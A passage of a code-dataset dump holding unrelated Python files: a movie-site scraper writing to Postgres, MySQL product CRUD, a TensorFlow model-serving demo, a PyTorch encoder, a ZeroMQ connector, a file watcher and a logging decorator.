(self.not_in_cache))\n","sub_path":"88739_AA_1stProject/code/Memoization/LCS_memoization_wrapper.py","file_name":"LCS_memoization_wrapper.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"420488955","text":"# pylint: disable=no-member\n# -*- encoding: utf-8 -*-\n'''\n@File : 电影天堂.py\n@Time : 2019/09/24 14:28:54\n@Author : Kellan Fan \n@Version : 1.0\n@Contact : kellanfan1989@gmail.com\n@Desc : 获取电影天堂的最新电影资源\n'''\n\n# here put the import lib\nimport json\nimport etcd\nimport psycopg2\nfrom lxml import etree\nfrom misc.openurl import OpenUrl\nclass Mypostgres(object):\n def __init__(self):\n etc_client = etcd.Client(host='10.91.158.2', port=2379)\n etc_result = etc_client.read('/project/spiderman/postgres')\n postgresql_info = json.loads(etc_result.value)\n self.db=psycopg2.connect(database=postgresql_info['database'], user=postgresql_info['user'], password=postgresql_info['password'], host=postgresql_info['host'], port=postgresql_info['port'])\n self.cursor=self.db.cursor()\n\n def close(self):\n self.cursor.close()\n self.db.close()\n\n def change_data(self, sql):\n try:\n self.cursor.execute(sql)\n self.db.commit()\n return 0\n except Exception as e:\n self.db.rollback()\n return e\n\n def select_data(self, sql):\n try:\n self.cursor.execute(sql)\n except Exception as e:\n return e\n else:\n return self.cursor.fetchall()\n\ndef getMovieUrl(html):\n selecter = etree.HTML(html)\n movie_url = selecter.xpath(\"//div[@class='bd3']/div[@class='bd3r'][1]/div/div[@class='bd3rl']/div[@class='co_area2'][1]//a/@href\")\n movie_url = set(movie_url)\n movie_url.remove('/app.html')\n movie_url.remove('/html/gndy/dyzz/index.html') \n return movie_url\n\ndef getMovieInfo(url):\n full_url = 'https://www.dytt8.net/' + url\n ourl = OpenUrl(full_url,'gb2312')\n code,html = ourl.openurl()\n info = {}\n if code==200:\n selecter = etree.HTML(html)\n try:\n info['name'] = selecter.xpath(\"//div[@class='title_all']/h1/font/text()\")[0]\n info['public_time'] = 
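The LCS_memoization_wrapper record above hand-rolls its cache dict and counters; functools.lru_cache provides the same memoization with built-in hit/miss statistics. A minimal sketch of the equivalent recursion:

from functools import lru_cache

def lcs_len(a, b):
    @lru_cache(maxsize=None)
    def rec(m, n):
        if m == 0 or n == 0:
            return 0
        if a[m - 1] == b[n - 1]:
            return 1 + rec(m - 1, n - 1)
        return max(rec(m - 1, n), rec(m, n - 1))
    result = rec(len(a), len(b))
    print(rec.cache_info())   # hits/misses, analogous to the class's counters
    return result

assert lcs_len("ABCBDAB", "BDCABA") == 4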
selecter.xpath(\"//div[@class='co_content8']/ul/text()\")[0].strip().split(':')[1]\n info['downlink'] = selecter.xpath(\"//tbody/tr/td/a/text()\")[0]\n return info\n except:\n return None\n\nif __name__ == \"__main__\":\n start_url='https://www.dytt8.net/'\n ourl = OpenUrl(start_url)\n code,html = ourl.openurl()\n if code == 200:\n info_list = []\n movie_list = getMovieUrl(html)\n for url in movie_list:\n tmp = getMovieInfo(url)\n if tmp:\n info_list.append(tmp)\n postgresql = Mypostgres()\n select_cmd = 'select public_time from dian_ying_tian_tang order by public_time desc limit 1'\n last_time = postgresql.select_data(select_cmd)[0][0].strip()\n for info in info_list:\n if info['public_time'] > last_time:\n cmd = \"insert into dian_ying_tian_tang(name,public_time,downlink) values ('%s', '%s', '%s')\"%(info['name'],info['public_time'],info['downlink'])\n res = postgresql.change_data(cmd)\n if res == 0:\n print(\"insert [%s] ok..\"%info['name'])\n else:\n print(res)\n postgresql.close()","sub_path":"spiderman/电影天堂.py","file_name":"电影天堂.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"259623305","text":"import pymysql\r\n\r\nclass BDproduto(object):\r\n\r\n def __init__(self):\r\n self.db = pymysql.connect(\"localhost\", \"root\", \"\", \"comercio\")\r\n self.cursor = self.db.cursor()\r\n\r\n def gravaBDproduto(self, codigo, nome, valorUnitario, quantidade):\r\n dados = (codigo, nome, valorUnitario, quantidade)\r\n self.cursor.execute(\"INSERT INTO produto(codigo, nome, valorUnitario, quantidade) VALUES (%s, %s, %s, %s)\", dados)\r\n self.db.commit()\r\n self.db.close()\r\n\r\n def atualizaNome(self, codigo, nome):\r\n dados = (nome, codigo)\r\n self.cursor.execute(\"UPDATE produto SET nome = %s WHERE codigo = %s\", dados)\r\n self.db.commit()\r\n self.db.close()\r\n\r\n def atualizaValorUnitario(self, codigo, valorUnitario):\r\n dados = (valorUnitario, codigo)\r\n self.cursor.execute(\"UPDATE produto SET valorUnitario = %s WHERE codigo = %s\", dados)\r\n self.db.commit()\r\n self.db.close()\r\n\r\n def atualizaQuantidade(self, codigo, quantidade):\r\n dados = (quantidade, codigo)\r\n self.cursor.execute(\"UPDATE produto SET quantidade = %s WHERE codigo = %s\", dados)\r\n self.db.commit()\r\n self.db.close()\r\n\r\n def recuperaBDproduto(self, codigo):\r\n self.cursor.execute(\"SELECT * FROM produto WHERE codigo = %s\", codigo)\r\n dado = self.cursor.fetchall()\r\n self.db.close()\r\n return dado\r\n\r\n def validaBDcodigo(self, codigo):\r\n self.cursor.execute(\"SELECT codigo FROM produto WHERE codigo = %s\", codigo)\r\n dado = self.cursor.fetchone()\r\n self.db.close()\r\n if not dado:\r\n return False\r\n else:\r\n return True","sub_path":"algoritmos/Ex1/Codigo Sistema Comercio/BDProduto.py","file_name":"BDProduto.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"101631178","text":"# -*- coding:utf-8 -*-\nimport logging\nimport os\nimport zipfile\nfrom urllib.parse import urlparse\n\nimport numpy as np\nimport tensorflow as tf\nfrom pai_tf_predict_proto import tf_predict_pb2\n\nfrom com.aliyun.api.gateway.sdk import client\nfrom com.aliyun.api.gateway.sdk.common import constant\nfrom com.aliyun.api.gateway.sdk.http import request\n\n\ndef zip_file(src_dir):\n zip_name = src_dir + '.zip'\n with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as z:\n for dirpath, dirnames, filenames in 
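BDproduto above closes self.db inside every method, so calling a second method on the same instance fails on the already-closed connection. One fix is a fresh connection per operation; a sketch reusing the record's connection parameters:

import pymysql

def run_query(sql, params=()):
    db = pymysql.connect(host="localhost", user="root", password="", database="comercio")
    try:
        with db.cursor() as cursor:
            cursor.execute(sql, params)
            rows = cursor.fetchall()
        db.commit()
        return rows
    finally:
        db.close()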
os.walk(src_dir):\n fpath = dirpath.replace(src_dir, '')\n fpath = fpath and fpath + os.sep or ''\n for filename in filenames:\n z.write(os.path.join(dirpath, filename), fpath + filename)\n\n\ndef get_last_meta_path(save_path):\n path = \"/\".join(save_path.split(\"/\")[:-1])\n model_name = save_path.split(\"/\")[-1]\n\n meta_file_info = {}\n for file_name in os.listdir(path):\n if file_name.find(model_name) == 0 and len(file_name) > 5 and file_name[-5:] == \".meta\":\n step_str = file_name[:-5].split(\"-\")[-1]\n try:\n meta_file_info[int(step_str)] = os.path.join(path, file_name)\n except ValueError as e:\n logging.error(e, exc_info=1)\n meta_file_info[0] = os.path.join(path, file_name)\n\n if not meta_file_info:\n return None\n\n meta_keys = list(meta_file_info.keys())\n meta_keys.sort()\n return meta_file_info[meta_keys[-1]]\n\n\ndef get_saver_and_last_step(meta_path, sess):\n if meta_path is None:\n return None, -1\n else:\n saver = tf.train.import_meta_graph(meta_path)\n saver.restore(sess, meta_path[:-5])\n try:\n return saver, int(meta_path[:-5].split(\"-\")[-1])\n except ValueError as e:\n logging.error(e, exc_info=1)\n return saver, -1\n\n\nclass LearningRate(object):\n def __init__(self):\n self._count = 0\n self._init = 0.01\n\n def get_learning_rate(self):\n return self._init * 0.95\n\n\nclass LinearFit(object):\n def __init__(self):\n self.sess = None\n self.learning_rate_manager = LearningRate()\n self.save_path = os.path.join(os.path.dirname(__file__), \"models_meta\", self.__class__.__name__)\n if not os.path.exists(self.save_path):\n os.makedirs(self.save_path, exist_ok=True)\n\n # 数据集\n train_data_size = 10000\n self.train_data_x = np.random.rand(train_data_size) * 10 # 0-10取值\n self.train_data_y = 20 * self.train_data_x + 3 + np.random.normal(loc=0, scale=0.1, size=(train_data_size,))\n self.test_data_x = np.arange(0, 10)\n self.test_data_y = 20 * self.test_data_x + 3\n\n @staticmethod\n def batch_data(x, y, size=128, last_cursor=None):\n if last_cursor is None:\n return x[:size], y[:size]\n else:\n if last_cursor + size >= x.shape[0]:\n return None, None\n return x[last_cursor: last_cursor + size], y[last_cursor:last_cursor + size]\n\n @staticmethod\n def build():\n # 参数\n tf_x = tf.placeholder(tf.float32, name=\"x\")\n tf_y = tf.placeholder(tf.float32, name=\"y\")\n tf_w = tf.Variable(0.0, name=\"w\", )\n tf_b = tf.Variable(0.0, name=\"b\", )\n tf_learning_rate = tf.Variable(0.01, name=\"learning_rate\")\n\n tf_y_predict = tf.multiply(tf_x, tf_w) + tf_b\n\n cross_entropy = tf.reduce_mean(tf.multiply(tf.square(tf_y - tf_y_predict), 0.5))\n train_step = tf.train.GradientDescentOptimizer(tf_learning_rate).minimize(cross_entropy)\n tf.add_to_collection(\"inputs\", tf_x)\n tf.add_to_collection(\"inputs\", tf_y)\n tf.add_to_collection(\"outputs\", tf_y_predict)\n tf.add_to_collection(\"outputs\", cross_entropy)\n tf.add_to_collection(\"outputs\", train_step)\n\n def train(self):\n if self.sess is None:\n self.sess = tf.InteractiveSession()\n\n saver, last_step = get_saver_and_last_step(get_last_meta_path(self.save_path), self.sess)\n if saver is None:\n # 没有持久化: 重新初始化模型\n print(\" init models ...\")\n self.build()\n self.sess.run(tf.global_variables_initializer())\n self.sess.run(tf.local_variables_initializer())\n saver = tf.train.Saver()\n else:\n print(\" restoring models ...\")\n\n tf_x, tf_y = tf.get_collection('inputs')\n tf_y_predict, cross_entropy, train_step = tf.get_collection(\"outputs\")\n graph = tf.get_default_graph()\n tf_w = 
graph.get_tensor_by_name(\"w:0\")\n tf_b = graph.get_tensor_by_name(\"b:0\")\n tf_learning_rate = graph.get_tensor_by_name(\"learning_rate:0\")\n print(\"w is {}, b is {}\".format(self.sess.run(tf_w), self.sess.run(tf_b)))\n\n batch_size = 1000\n global_step = last_step\n for i in range(10):\n train_data_cursor = 0\n while True:\n batch_x, batch_y = self.batch_data(self.train_data_x, self.train_data_y, batch_size, train_data_cursor)\n train_data_cursor = train_data_cursor + batch_size\n if batch_x is None and batch_y is None:\n break\n self.sess.run(train_step, feed_dict={tf_x: batch_x,\n tf_y: batch_y,\n tf_learning_rate: self.learning_rate_manager.get_learning_rate()})\n\n global_step += 1\n if global_step % 10 == 0:\n saver.save(self.sess, self.save_path, global_step=global_step)\n\n print(\"w is {}, b is {}\".format(self.sess.run(tf_w), self.sess.run(tf_b)))\n print(\"cross is {}\".format(self.sess.run(tf.reduce_mean(\n self.sess.run(cross_entropy, feed_dict={tf_x: self.test_data_x, tf_y: self.test_data_y})\n ))))\n\n self.sess.close()\n\n def build_simple_model(self, export_dir: str):\n \"\"\" \"\"\"\n sess = tf.InteractiveSession()\n saver, last_step = get_saver_and_last_step(get_last_meta_path(self.save_path), sess)\n tf_x, tf_y = tf.get_collection('inputs')\n tf_y_predict, cross_entropy, train_step = tf.get_collection(\"outputs\")\n graph = tf.get_default_graph()\n tf_w = graph.get_tensor_by_name(\"w:0\")\n tf_b = graph.get_tensor_by_name(\"b:0\")\n tf.saved_model.simple_save(\n session=sess,\n export_dir=export_dir,\n inputs={\"x\": tf_x},\n outputs={\"y\": tf_y_predict},\n )\n sess.close()\n\n def build_complex_model(self, export_dir: str):\n \"\"\" \"\"\"\n sess = tf.InteractiveSession()\n saver, last_step = get_saver_and_last_step(get_last_meta_path(self.save_path), sess)\n tf_x, tf_y = tf.get_collection('inputs')\n tf_y_predict, cross_entropy, train_step = tf.get_collection(\"outputs\")\n graph = tf.get_default_graph()\n tf_w = graph.get_tensor_by_name(\"w:0\")\n tf_b = graph.get_tensor_by_name(\"b:0\")\n\n # 调整模型\n tf_d = tf.placeholder(tf.float32, name=\"d\")\n new_y = tf_y_predict + tf_d\n\n tf.saved_model.simple_save(\n session=sess,\n export_dir=export_dir,\n inputs={\"x\": tf_x, \"d\": tf_d},\n outputs={\"y\": new_y},\n )\n sess.close()\n\n def serving(self, saved_model_dir: str):\n \"\"\" 运行服务 \"\"\"\n pass\n\n\nclass PAIClientDemo(object):\n app_key = 'xxx'\n app_secret = 'xxx'\n\n @staticmethod\n def predict(url, app_key, app_secret, request_data):\n cli = client.DefaultClient(app_key=app_key, app_secret=app_secret)\n body = request_data\n url_ele = urlparse(url)\n host = 'https://' + url_ele.hostname\n path = url_ele.path\n req_post = request.Request(host=host, protocol=constant.HTTP, url=path, method=\"POST\", time_out=6000)\n req_post.set_body(body)\n req_post.set_content_type(constant.CONTENT_TYPE_STREAM)\n stat, header, content = cli.execute(req_post)\n return stat, dict(header) if header is not None else {}, content\n\n def simple(self, x: float):\n # 输入模型信息,点击模型名字就可以获取到了\n url = 'https://xxxx-cn-shenzhen.alicloudapi.com/EAPI_1372988890346240_demo_simple'\n\n # 构造服务\n _request = tf_predict_pb2.PredictRequest()\n _request.signature_name = 'serving_default'\n _request.inputs['x'].dtype = tf_predict_pb2.DT_FLOAT # images 参数类型\n _request.inputs['x'].float_val.extend([x])\n\n # 将pb序列化成string进行传输\n request_data = _request.SerializeToString()\n stat, header, content = self.predict(url, self.app_key, self.app_secret, request_data)\n if stat != 200:\n print('Http status 
code: ', stat)\n print('Error msg in header: ', header['x-ca-error-message'] if 'x-ca-error-message' in header else '')\n print('Error msg in body: ', content)\n else:\n response = tf_predict_pb2.PredictResponse()\n response.ParseFromString(content)\n print(response)\n\n def complex(self, x: float, d: float):\n # 输入模型信息,点击模型名字就可以获取到了\n url = \"https://xxxx-cn-shenzhen.alicloudapi.com/EAPI_1372988890346240_demo_complex\"\n\n # 构造服务\n _request = tf_predict_pb2.PredictRequest()\n _request.signature_name = 'serving_default'\n _request.inputs['x'].dtype = tf_predict_pb2.DT_FLOAT # images 参数类型\n _request.inputs['x'].float_val.extend([x])\n\n _request.inputs['d'].dtype = tf_predict_pb2.DT_FLOAT # images 参数类型\n _request.inputs['d'].float_val.extend([d])\n\n # 将pb序列化成string进行传输\n request_data = _request.SerializeToString()\n stat, header, content = self.predict(url, self.app_key, self.app_secret, request_data)\n if stat != 200:\n print('Http status code: ', stat)\n print('Error msg in header: ', header['x-ca-error-message'] if 'x-ca-error-message' in header else '')\n print('Error msg in body: ', content)\n else:\n response = tf_predict_pb2.PredictResponse()\n response.ParseFromString(content)\n print(response)\n\n\ndef build_model(_export_dir: str):\n if not os.path.exists(_export_dir):\n os.makedirs(_export_dir, exist_ok=True)\n\n LinearFit().build_simple_model(export_dir=_export_dir)\n\n zip_file(_export_dir)\n\n\ndef call_simple_server(x: float):\n PAIClientDemo().simple(x=x)\n\n\ndef build_complex_model(_export_dir: str):\n if not os.path.exists(_export_dir):\n os.makedirs(_export_dir, exist_ok=True)\n\n LinearFit().build_complex_model(export_dir=_export_dir)\n\n zip_file(_export_dir)\n\n\ndef call_complex_server(x: float, d: float):\n PAIClientDemo().complex(x=x, d=d)\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":10955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"634898471","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\nclass Encoder(nn.Module):\r\n def __init__(self,\r\n in_channels=567,\r\n z_channels=128):\r\n super(Encoder, self).__init__()\r\n \r\n self.in_channels = in_channels\r\n self.z_channels = z_channels\r\n \r\n self.conv1d_start = nn.Conv1d(in_channels, 768, kernel_size=3,\r\n padding=(3 - 1) // 2)\r\n self.gblocks = nn.ModuleList ([\r\n GBlock(768, 768, z_channels, 1),\r\n GBlock(768, 768, z_channels, 1),\r\n GBlock(768, 384, z_channels, 2),\r\n GBlock(384, 384, z_channels, 2),\r\n GBlock(384, 384, z_channels, 2),\r\n GBlock(384, 192, z_channels, 3),\r\n GBlock(192, 96, z_channels, 5)\r\n ])\r\n self.conv1d_end = nn.Conv1d(96, 1, kernel_size=3, padding=(3 - 1) // 2)\r\n \r\n def forward(self, inputs, z):\r\n outputs = self.conv1d_start(inputs)\r\n for layer in self.gblocks:\r\n outputs = layer(outputs, z)\r\n outputs = self.conv1d_end(outputs)\r\n \r\n return outputs\r\n\r\nclass GBlock(nn.Module):\r\n def __init__(self,\r\n in_channels,\r\n hidden_channels,\r\n z_channels,\r\n upsample_factor):\r\n super(GBlock, self).__init__()\r\n self.in_channels = in_channels\r\n self.hidden_channels = hidden_channels\r\n self.upsample_factor = upsample_factor\r\n \r\n self.condition_batchnorm1 = ConditionalBatchNorm1d(in_channels)\r\n self.linear1 = nn.Linear(z_channels, in_channels)\r\n self.stack_first = nn.Sequential(\r\n nn.ReLU(inplace=False),\r\n UpsampleNet(in_channels, in_channels, upsample_factor),\r\n 
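get_last_meta_path in the demo.py record above scans the checkpoint directory by hand; TensorFlow 1.x (the API generation the record uses) already records the newest checkpoint in its bookkeeping file. A sketch assuming the same name-step save layout:

import tensorflow as tf

def restore_latest(sess, save_dir):
    ckpt = tf.train.latest_checkpoint(save_dir)    # e.g. ".../LinearFit-120"
    if ckpt is None:
        return None, -1
    saver = tf.train.import_meta_graph(ckpt + ".meta")
    saver.restore(sess, ckpt)
    return saver, int(ckpt.rsplit("-", 1)[-1])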
nn.Conv1d(in_channels, hidden_channels, kernel_size=3,\r\n padding=(3 - 1) // 2)\r\n )\r\n \r\n self.condition_batchnorm2 = ConditionalBatchNorm1d(hidden_channels)\r\n self.linear2 = nn.Linear(z_channels, hidden_channels)\r\n self.second_stack = nn.Sequential(\r\n nn.ReLU(inplace=False),\r\n nn.Conv1d(hidden_channels, hidden_channels, kernel_size=3,\r\n dilation=2, padding=2 * (3 - 1) // 2)\r\n )\r\n \r\n self.residual1 = nn.Sequential(\r\n UpsampleNet(in_channels, in_channels, upsample_factor), \r\n nn.Conv1d(in_channels, hidden_channels, kernel_size=1)\r\n )\r\n \r\n self.condition_batchnorm3 = ConditionalBatchNorm1d(hidden_channels)\r\n self.linear3 = nn.Linear(z_channels, hidden_channels)\r\n self.third_stack = nn.Sequential(\r\n nn.ReLU(inplace=False),\r\n nn.Conv1d(hidden_channels, hidden_channels, kernel_size=3,\r\n dilation=4, padding=4 * (3 - 1) // 2)\r\n )\r\n \r\n self.condition_batchnorm4 = ConditionalBatchNorm1d(hidden_channels)\r\n self.linear4 = nn.Linear(z_channels, hidden_channels)\r\n self.fourth_stack = nn.Sequential(\r\n nn.ReLU(inplace=False),\r\n nn.Conv1d(hidden_channels, hidden_channels, kernel_size=3,\r\n dilation=8, padding=8 * (3 - 1) // 2)\r\n )\r\n \r\n def forward(self, condition, z):\r\n inputs = condition\r\n outputs = self.condition_batchnorm1(inputs, self.linear1(z))\r\n outputs = self.stack_first(outputs)\r\n outputs = self.condition_batchnorm2(outputs, self.linear2(z))\r\n \r\n residual_outputs = self.residual1(inputs)\r\n \r\n residual_outputs = outputs + residual_outputs\r\n \r\n outputs = self.condition_batchnorm3(residual_outputs, self.linear3(z))\r\n outputs = self.third_stack(outputs)\r\n outputs = self.condition_batchnorm4(outputs, self.linear4(z))\r\n outputs = self.fourth_stack(outputs)\r\n \r\n outputs = outputs + residual_outputs\r\n \r\n return outputs\r\n \r\n \r\nclass UpsampleNet(nn.Module):\r\n def __init__(self,\r\n input_size,\r\n output_size,\r\n upsample_factor,\r\n use_lstm=False,\r\n lstm_layer=2,\r\n upsample_method=\"duplicate\"):\r\n\r\n super(UpsampleNet, self).__init__()\r\n self.upsample_method = upsample_method\r\n self.upsample_factor = upsample_factor\r\n self.use_lstm = use_lstm\r\n if use_lstm:\r\n self.lstm_layer = nn.LSTM(input_size, output_size, num_layers=lstm_layer, batch_first=True)\r\n if upsample_method == 'duplicate':\r\n self.upsample_factor = int(np.prod(upsample_factor))\r\n elif upsample_method == 'transposed_conv2d':\r\n assert isinstance(upsample_factor, tuple)\r\n kernel_size = 3\r\n self.upsamples = nn.ModuleList()\r\n for u in upsample_factor:\r\n padding = (kernel_size - 1) // 2\r\n conv = nn.ConvTranspose2d(1, 1, (kernel_size, 2 * u),\r\n padding=(padding, u // 2),\r\n dilation=1, stride=(1, u))\r\n self.upsamples.append(conv)\r\n\r\n def forward(self, inputs):\r\n if self.use_lstm:\r\n inputs, _ = self.lstm_layer(inputs.transpose(1, 2))\r\n inputs = inputs.transpose(1, 2)\r\n if self.upsample_method == 'duplicate':\r\n output = F.interpolate(inputs, scale_factor=self.upsample_factor, mode='nearest')\r\n elif self.upsample_method == 'transposed_conv2d':\r\n output = input.unsqueeze(1)\r\n for layer in self.upsamples:\r\n output = layer(output)\r\n output = output.squeeze(1)\r\n output = output[:, :, : input.size(-1) * np.prod(self.upsample_factor)]\r\n\r\n return output\r\n \r\nclass ConditionalBatchNorm1d(nn.BatchNorm1d):\r\n \r\n \"\"\"Conditional Batch Normalization\"\"\"\r\n\r\n def __init__(self,\r\n num_features,\r\n eps=1e-05,\r\n momentum=0.1,\r\n affine=False,\r\n 
track_running_stats=True):\r\n \r\n super(ConditionalBatchNorm1d, self).__init__(\r\n num_features=num_features,\r\n eps=eps,\r\n momentum=momentum,\r\n affine=affine,\r\n track_running_stats=track_running_stats\r\n )\r\n self.scale = nn.Linear(num_features, num_features)\r\n self.shift = nn.Linear(num_features, num_features)\r\n\r\n def forward(self, input, condition):\r\n self._check_input_dim(input)\r\n\r\n exponential_average_factor = 0.0\r\n\r\n if self.training and self.track_running_stats:\r\n self.num_batches_tracked += 1\r\n if self.momentum is None: # use cumulative moving average\r\n exponential_average_factor = 1.0 / self.num_batches_tracked.item()\r\n else: # use exponential moving average\r\n exponential_average_factor = self.momentum\r\n\r\n output = F.batch_norm(input, self.running_mean, self.running_var,\r\n self.weight, self.bias,\r\n self.training or not self.track_running_stats,\r\n exponential_average_factor, self.eps)\r\n \r\n size = output.size()\r\n \r\n scale = self.scale(condition).unsqueeze(-1).expand(size)\r\n shift = self.shift(condition).unsqueeze(-1).expand(size)\r\n output = scale * output + shift\r\n \r\n return output\r\n\r\nmodel = Encoder(567, 128)\r\n\r\ncondition = torch.randn(2, 567, 10)\r\nz = torch.randn(2, 128)\r\n\r\noutput = model(condition, z)\r\nprint(output.shape)","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"557699627","text":"\nimport zmq\nimport multiprocessing.dummy as thread\n\ndef _print(*args):\n print(\">netconnn>\",*args)\n\nclass ConnectorNetwork:\n def __init__(self,netconf,appid,name):\n self.netconf = netconf\n self.appid = appid\n self.name = name\n self.myaddr = self.netconf.get_address(name)\n\n mux_addr = self.netconf.get_address('MUX_in')\n ctx = zmq.Context()\n self.mux_sock= ctx.socket(zmq.PUSH)\n self.mux_sock.connect(mux_addr)\n\n self.notif_sock = ctx.socket(zmq.REP)\n self.notif_sock.bind(self.myaddr)\n\n def send(self,message):\n message['appid']=self.appid\n self.mux_sock.send_json(message)\n\n def listen_for_notif(self, callback):\n def listener(callback):\n _print(\"Listening DMX on %s ...\"%self.myaddr)\n while True:\n notif = self.notif_sock.recv_json()\n try:\n response = callback(notif)\n except Exception as e:\n _print(\"ERROR in notif callback. 
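In UpsampleNet above, the transposed_conv2d branch of forward refers to the builtin input rather than the inputs argument, so that path would fail at runtime. The default 'duplicate' path is plain nearest-neighbour repetition along the time axis, which this quick check confirms:

import torch
import torch.nn.functional as F

x = torch.arange(6.0).reshape(1, 1, 6)                    # (batch, channels, time)
up = F.interpolate(x, scale_factor=3, mode="nearest")     # the 'duplicate' path
assert torch.equal(up, x.repeat_interleave(3, dim=-1))    # same as repeating each sample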
sending fail\")\n self.notif_sock.send_string(\"FAIL\")\n raise e\n\n self.notif_sock.send_string(response)\n\n p = thread.Process(target=listener, args=(callback,),\n name=self.name+'_notif_listen')\n p.start()\n return p\n\n","sub_path":"v2/goalnet/connectors/tasks/intra.py","file_name":"intra.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"600495818","text":"# -*- coding:utf8 -*-\n\n\n\ndef request_upload_media(gcid, size, title):\n payload = {\n \"bisType\": \"websessionId\",\n \"oauthAppId\": \"mobileThunderSubscription\",\n #\"openId\": \"529942747\",\n \"openId\": str(g.user_id),\n #\"accessToken\": \"64F1E047EA04CFCFFB746052A530CB6103850DB77EBE90C1CBA807DBC403B85641F910BCEBA1147587754815A2BCCD11B668B4518FF0F209F98E66EEBB423CDE\",\n \"accessToken\": str(g.session_id),\n \"type\": \"mobileThunderSubscription\",\n \"deviceId\": str(g.device_id),\n \"appId\": config.appId,\n \"callId\": int(\n time.time() *\n 1000)}\n sig = gen_sig(payload, config.secret)\n payload['sig'] = sig\n status, output = curl.openurl(config.login_url, postdata=urllib.urlencode(\n payload), header={'Content-Type': 'application/x-www-form-urlencoded'})\n if int(status) != 200:\n return cons.CODE_FAIL, None\n data = json.loads(output)\n code = data.get('code', 0)\n if int(code) != 0:\n return 'auth fail', None\n userSecretkey = data.get('userSecretKey')\n t = data.get('t')\n file = {\n \"gcid\": str(gcid),\n \"path\": gcid + '.mp4',\n \"size\": int(size),\n \"createTime\": int(time.time() * 1000),\n \"title\": title\n }\n\n payload = {\n \"uploadMethod\": \"user\",\n \"files\": json.dumps([file]),\n \"appId\": config.appId,\n \"callId\": int(\n time.time() * 1000),\n \"t\": t}\n sig = gen_sig(payload, config.secret + userSecretkey)\n payload['sig'] = sig\n status, output = curl.openurl(config.request_url, postdata=urllib.urlencode(\n payload), header={'Content-Type': 'application/x-www-form-urlencoded'})\n if int(status) != 200:\n return cons.CODE_FAIL, None\n data = json.loads(output)\n code = data.get('code', 0)\n if int(code) != 0:\n return cons.CODE_FAIL, None\n return cons.CODE_OK, 1\n\n","sub_path":"scripts/commit_media.py","file_name":"commit_media.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"125204038","text":"#!/usr/bin/python3.5\n# python3 watcher.py 'temp' 'php -f script.php'\n\nimport os\nimport sys\nimport json\nimport time\nimport fcntl\nimport signal\n\n\nFNAME = False\nSYSCOMMAND = False\narguments = sys.argv[1:]\n\n\ndef to_path(path):\n _path = path\n if path[-1] is not '/':\n _path = path + '/'\n return _path\n\n\ndef parse_json_file(file):\n directory = False\n command = False\n try:\n with open(arguments[0], 'r') as file:\n config = json.load(file)\n except FileNotFoundError:\n print('[watcher] Error. 
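The ConnectorNetwork record above binds a REP socket and replies with a status string. For completeness, the matching client side is a REQ socket; a minimal sketch with an illustrative address:

import zmq

def notify(addr, payload):
    ctx = zmq.Context.instance()
    sock = ctx.socket(zmq.REQ)
    sock.connect(addr)              # e.g. "tcp://127.0.0.1:5555"
    sock.send_json(payload)
    return sock.recv_string()       # the listener replies "FAIL" or its callback's result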
File Not Found \"%s\"' % (file))\n else:\n try:\n directory = to_path(config['watcher_directory'])\n command = config['watcher_command']\n except KeyError:\n print('[watcher] Config not find keys \"watcher_directory\" or \"watcher_command\"')\n return {'directory': directory, 'command': command}\n\n\nif len(arguments) is 2:\n FNAME = to_path(arguments[0])\n SYSCOMMAND = arguments[1]\nelif len(arguments) is 1 and os.path.isfile(arguments[0]):\n config = parse_json_file(arguments[0])\n FNAME = config['directory']\n SYSCOMMAND = config['command']\nelif os.path.isfile('config.json'):\n config = parse_json_file('config.json')\n FNAME = config['directory']\n SYSCOMMAND = config['command']\n\n\nif os.path.exists(FNAME) is False:\n print('[watcher] Path not exist \"%s\". Exit' % (FNAME))\n exit()\nelif SYSCOMMAND is False:\n print('[watcher] Command not find. Exit')\n exit()\nelse:\n print('[watcher] start')\n\n\ndef handler(signum, frame):\n try:\n print('[watcher] Catch changes \"%s\". run \"%s\"' % (FNAME, SYSCOMMAND))\n os.system(SYSCOMMAND)\n except RuntimeError:\n pass\n\n\n# FileNotFoundError:\nfd = os.open(FNAME, os.O_RDONLY)\nfcntl.fcntl(fd, fcntl.F_NOTIFY, fcntl.DN_MODIFY | fcntl.DN_MULTISHOT)\n\nsignal.signal(signal.SIGIO, handler)\n\nwhile True:\n time.sleep(1000)\n","sub_path":"jsmb_nodemanager/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"579812346","text":"\"\"\"\nReturns total price paid for individual rentals\n\"\"\"\nimport argparse\nimport json\nimport datetime\nimport math\nimport logging\n\n\ndef logged_func(func):\n \"\"\"Decorator function\"\"\"\n def log_debug(debug, *args, **kwargs):\n \"\"\"Function to enable the required debugging level\"\"\"\n #logging.debug(ARGS)\n log_format = \"%(asctime)s %(filename)s:%(lineno)-3d %(levelname)s %(message)s\"\n log_file = datetime.datetime.now().strftime('%Y-%m-%d') + '_charges_calc.log'\n formatter = logging.Formatter(log_format)\n\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(formatter)\n\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n\n logger = logging.getLogger()\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n debug_level = debug\n if debug_level == 0:\n # This will disable all the logging\n logger.disabled = True\n file_handler.disabled = True\n elif debug_level == 1:\n # \"\"\"Error messages; This prints error and above 